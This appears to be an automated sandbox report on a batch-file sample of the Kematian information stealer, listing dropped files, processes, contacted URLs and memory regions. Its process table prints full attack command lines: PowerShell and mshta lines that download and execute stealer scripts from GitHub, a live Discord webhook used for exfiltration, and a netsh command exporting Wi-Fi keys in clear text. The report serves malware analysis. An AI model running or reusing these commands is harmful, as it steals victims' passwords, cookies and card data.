Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
thegreatestexecutor.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (717), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xcfae260a, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D_US_user-PC_2024-07-03_UTC-5.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
modified
|
||
C:\Users\user\AppData\Local\Temp\RESA945.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Jul 3 18:33:18 2024,
1st section name ".debug$S"
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20kjb1pw.nyx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2itzvt3e.wy2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dxleh4z.wuq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3svzlauz.o0z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rclnls5.qkf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avdfp12q.xmg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxloozaa.nn3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0gitxd4.tuc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvccjps1.4d0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlk5d2h2.kbq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcs3himz.ui1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jial2c1p.2oj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mu30yupw.omr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oc2cd2ry.35t.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxljezbk.cwb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgxticly.o5k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjsl32ny.bzb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5gxzn2x.vwl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\autofill.json
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.0.cs
|
Unicode text, UTF-8 (with BOM) text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (803), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\cards.json
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\cookies_netscape_Chrome.txt
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\discord.json
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\downloads.json
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\history.json
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\passwords.json
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\screenshot.png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Chrome.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Edge.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Firefox.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\System.txt
|
Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\productkey.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\screenshot.png (copy)
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\Desktop\kdotLffirs.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\kdotqxeWQd.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\kdotsmFuj.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\kdotzASik.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 42 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity
-Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -nop -c "Write-Host -NoNewLine $null"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -nop -c "Write-Host -NoNewLine $null"
|
||
C:\Windows\System32\rundll32.exe
|
rundll32
|
||
C:\Windows\System32\mshta.exe
|
mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri
'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace
'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw'
| iex",0))
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1'
-UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw'
| iex
|
||
C:\Windows\System32\netsh.exe
|
"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
|
||
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
|
||
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
|
||
C:\Windows\System32\net.exe
|
net session
|
||
C:\Windows\System32\net1.exe
|
C:\Windows\system32\net1 session
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp"
"c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
|
There are 13 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
|
185.199.109.133
|
||
https://github.com
|
unknown
|
||
https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnw
|
unknown
|
||
https://raw.githubusercontent.com/ChildrenOfYa
|
unknown
|
||
https://raw.githubusercontent.com
|
unknown
|
||
https://raw.git
|
unknown
|
||
https://github.com/Somali-Devs/Kematian-Stealer
|
unknown
|
||
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
|
140.82.121.3
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
|
unknown
|
||
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
|
unknown
|
||
https://www.cloudflare.com/cdn-cgi/trace
|
104.16.123.96
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://ip-api.com/json
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
https://www.cloudflare.com
|
unknown
|
||
https://raw.githubusercontent.com/C$&m
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
|
140.82.121.3
|
||
https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
|
140.82.121.3
|
||
http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0
|
unknown
|
||
http://github.com
|
unknown
|
||
https://github.com/TheWover
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
|
unknown
|
||
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
|
185.199.109.133
|
||
http://ip-api.com
|
unknown
|
||
http://raw.githubusercontent.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
|
unknown
|
||
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
|
185.199.109.133
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 38 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
github.com
|
140.82.121.3
|
||
raw.githubusercontent.com
|
185.199.109.133
|
||
ip-api.com
|
208.95.112.1
|
||
www.cloudflare.com
|
104.16.123.96
|
||
objects.githubusercontent.com
|
185.199.110.133
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
185.199.109.133
|
raw.githubusercontent.com
|
Netherlands
|
||
140.82.121.3
|
github.com
|
United States
|
||
185.199.110.133
|
objects.githubusercontent.com
|
Netherlands
|
||
127.0.0.1
|
unknown
|
unknown
|
||
104.16.123.96
|
www.cloudflare.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2B3CFD0D000
|
trusted library allocation
|
page read and write
|
||
2B3D825A000
|
heap
|
page read and write
|
||
AD6D37E000
|
unkown
|
page readonly
|
||
23F4B913000
|
heap
|
page read and write
|
||
20A57467000
|
trusted library allocation
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
BB8EC7E000
|
stack
|
page read and write
|
||
C0003DE000
|
direct allocation
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
706843E000
|
stack
|
page read and write
|
||
2A801EF0000
|
heap
|
page read and write
|
||
236B5430000
|
trusted library allocation
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
2A801E50000
|
heap
|
page read and write
|
||
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
260870E000
|
stack
|
page read and write
|
||
706813A000
|
stack
|
page read and write
|
||
2607C3E000
|
stack
|
page read and write
|
||
236B1400000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
2B3D827C000
|
heap
|
page read and write
|
||
21E68B04000
|
heap
|
page read and write
|
||
7DF453CB0000
|
trusted library allocation
|
page execute and read and write
|
||
1DF1C260000
|
direct allocation
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
26086C3000
|
stack
|
page read and write
|
||
216661A8000
|
heap
|
page read and write
|
||
20A6E4F6000
|
heap
|
page read and write
|
||
7FFAAC50D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC9C0000
|
trusted library allocation
|
page read and write
|
||
20A57F59000
|
trusted library allocation
|
page read and write
|
||
2B3D7F76000
|
heap
|
page read and write
|
||
236AFB30000
|
heap
|
page read and write
|
||
1DF13A50000
|
trusted library allocation
|
page read and write
|
||
7FFB1E3B6000
|
unkown
|
page readonly
|
||
21E68C1B000
|
heap
|
page read and write
|
||
236B5409000
|
trusted library allocation
|
page read and write
|
||
BB8FB4E000
|
stack
|
page read and write
|
||
236B1AD0000
|
trusted library allocation
|
page read and write
|
||
21E68B5E000
|
heap
|
page read and write
|
||
23F50610000
|
trusted library allocation
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
21E68A9B000
|
heap
|
page read and write
|
||
1DF1DA09000
|
unclassified section
|
page read and write
|
||
236B1783000
|
trusted library allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
7FFAAC5A1000
|
trusted library allocation
|
page read and write
|
||
236B3B47000
|
trusted library allocation
|
page read and write
|
||
AD6B177000
|
stack
|
page read and write
|
||
20A54040000
|
heap
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
20A57BCC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC920000
|
trusted library allocation
|
page read and write
|
||
21666164000
|
heap
|
page read and write
|
||
236AFBFE000
|
heap
|
page read and write
|
||
70683BB000
|
stack
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
23F4AEE0000
|
heap
|
page read and write
|
||
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
21E6899A000
|
heap
|
page read and write
|
||
2B3C127F000
|
trusted library allocation
|
page read and write
|
||
2EE29F20000
|
direct allocation
|
page read and write
|
||
2EE28597000
|
heap
|
page read and write
|
||
20A54304000
|
heap
|
page read and write
|
||
21E68455000
|
heap
|
page read and write
|
||
2B9427F000
|
stack
|
page read and write
|
||
20A569FF000
|
trusted library allocation
|
page read and write
|
||
23F4B08F000
|
heap
|
page read and write
|
||
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
2B3D82A1000
|
heap
|
page read and write
|
||
2EE29F63000
|
direct allocation
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
2B3C1068000
|
trusted library allocation
|
page read and write
|
||
AD6CC7B000
|
stack
|
page read and write
|
||
1DF01C73000
|
heap
|
page read and write
|
||
2B3D7A53000
|
trusted library allocation
|
page read and write
|
||
2EE2C070000
|
direct allocation
|
page read and write
|
||
23F4C0E0000
|
trusted library section
|
page readonly
|
||
2EE285A9000
|
heap
|
page read and write
|
||
21E68A46000
|
heap
|
page read and write
|
||
1DF1DA95000
|
unclassified section
|
page read and write
|
||
236B15A3000
|
heap
|
page read and write
|
||
2B3C1028000
|
trusted library allocation
|
page read and write
|
||
23F51000000
|
heap
|
page read and write
|
||
1DF1BE20000
|
heap
|
page read and write
|
||
2EE2C03E000
|
direct allocation
|
page read and write
|
||
21E6893F000
|
heap
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
6FB81FF000
|
stack
|
page read and write
|
||
1DF01C60000
|
heap
|
page read and write
|
||
C00004D000
|
direct allocation
|
page read and write
|
||
236B1AD4000
|
trusted library allocation
|
page read and write
|
||
21E68434000
|
heap
|
page read and write
|
||
2EE28583000
|
heap
|
page read and write
|
||
21E6843C000
|
heap
|
page read and write
|
||
2EE28609000
|
heap
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
2B3D8570000
|
heap
|
page read and write
|
||
20A572FA000
|
trusted library allocation
|
page read and write
|
||
BB8EE7B000
|
stack
|
page read and write
|
||
21E68A83000
|
heap
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
C0003E8000
|
direct allocation
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
AD6B97B000
|
stack
|
page read and write
|
||
2EE2858D000
|
heap
|
page read and write
|
||
1DF14E69000
|
trusted library allocation
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
236B1470000
|
heap
|
page readonly
|
||
2166615B000
|
heap
|
page read and write
|
||
2EE28562000
|
heap
|
page read and write
|
||
21E68BEE000
|
heap
|
page read and write
|
||
7FFAAC3E3000
|
trusted library allocation
|
page execute and read and write
|
||
21E68B62000
|
heap
|
page read and write
|
||
BB8FACE000
|
stack
|
page read and write
|
||
260884E000
|
stack
|
page read and write
|
||
236B1780000
|
trusted library allocation
|
page read and write
|
||
23F4B91A000
|
heap
|
page read and write
|
||
236B4042000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5E0000
|
trusted library allocation
|
page execute and read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
2B3CFA30000
|
trusted library allocation
|
page read and write
|
||
21E68A41000
|
heap
|
page read and write
|
||
21E68A29000
|
heap
|
page read and write
|
||
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
1DF03710000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3F0000
|
trusted library allocation
|
page read and write
|
||
21E68AD8000
|
heap
|
page read and write
|
||
21E689B1000
|
heap
|
page read and write
|
||
C000006000
|
direct allocation
|
page read and write
|
||
236B1570000
|
heap
|
page read and write
|
||
2EE28589000
|
heap
|
page read and write
|
||
21E68444000
|
heap
|
page read and write
|
||
BB8EAFE000
|
stack
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
21E68AA5000
|
heap
|
page read and write
|
||
21E68443000
|
heap
|
page read and write
|
||
20A6E20D000
|
heap
|
page read and write
|
||
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
21E68244000
|
heap
|
page read and write
|
||
21E6AC56000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
236AFAF0000
|
heap
|
page read and write
|
||
2EE2BE70000
|
direct allocation
|
page read and write
|
||
21E68AF8000
|
heap
|
page read and write
|
||
2B3C1082000
|
trusted library allocation
|
page read and write
|
||
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
1DF1C048000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
1C8285C4000
|
heap
|
page read and write
|
||
236B41BA000
|
trusted library allocation
|
page read and write
|
||
21E68B06000
|
heap
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
1DF036A0000
|
trusted library allocation
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
7FFAAC6F0000
|
trusted library allocation
|
page execute and read and write
|
||
2EE28596000
|
heap
|
page read and write
|
||
2EE28604000
|
heap
|
page read and write
|
||
FD7834E000
|
stack
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
216661E6000
|
heap
|
page read and write
|
||
7068D8E000
|
stack
|
page read and write
|
||
7FFAAC620000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB1E3A0000
|
unkown
|
page readonly
|
||
20A6E3A9000
|
heap
|
page read and write
|
||
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
236B5319000
|
trusted library allocation
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
21E68AF8000
|
heap
|
page read and write
|
||
23F50800000
|
trusted library allocation
|
page read and write
|
||
21E68448000
|
heap
|
page read and write
|
||
7FFAAC496000
|
trusted library allocation
|
page read and write
|
||
C0000FC000
|
direct allocation
|
page read and write
|
||
21666176000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
23F4B07D000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
2B3BE125000
|
heap
|
page read and write
|
||
7FFB16790000
|
unkown
|
page readonly
|
||
21E68C00000
|
heap
|
page read and write
|
||
BB8EDF7000
|
stack
|
page read and write
|
||
236B3B55000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
21E68A4F000
|
heap
|
page read and write
|
||
20A6E1F7000
|
heap
|
page read and write
|
||
21E6CE20000
|
trusted library allocation
|
page read and write
|
||
23F50590000
|
trusted library allocation
|
page read and write
|
||
216661A0000
|
heap
|
page read and write
|
||
21E68BA4000
|
heap
|
page read and write
|
||
21E689C7000
|
heap
|
page read and write
|
||
2C388D40000
|
heap
|
page read and write
|
||
1DF1D6FD000
|
unclassified section
|
page read and write
|
||
21E68C05000
|
heap
|
page read and write
|
||
20A6E350000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
C000280000
|
direct allocation
|
page read and write
|
||
BB8ECFE000
|
stack
|
page read and write
|
||
2EE285DF000
|
heap
|
page read and write
|
||
21E6899C000
|
heap
|
page read and write
|
||
C00043F000
|
direct allocation
|
page read and write
|
||
21E6843C000
|
heap
|
page read and write
|
||
2EE28592000
|
heap
|
page read and write
|
||
4113FFD000
|
stack
|
page read and write
|
||
1A3B3DB4000
|
heap
|
page read and write
|
||
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
1DF1C21C000
|
direct allocation
|
page read and write
|
||
7FFAAC502000
|
trusted library allocation
|
page read and write
|
||
236B1825000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
2B3BE270000
|
heap
|
page read and write
|
||
2B3D8232000
|
heap
|
page read and write
|
||
21E6CA22000
|
trusted library allocation
|
page read and write
|
||
2EE29F7B000
|
direct allocation
|
page read and write
|
||
4114F8E000
|
stack
|
page read and write
|
||
2A801EF8000
|
heap
|
page read and write
|
||
21E68A09000
|
heap
|
page read and write
|
||
F7FA7FE000
|
stack
|
page read and write
|
||
1DF03DE6000
|
trusted library allocation
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
2EE28500000
|
heap
|
page read and write
|
||
236B4611000
|
trusted library allocation
|
page read and write
|
||
2B3C1639000
|
trusted library allocation
|
page read and write
|
||
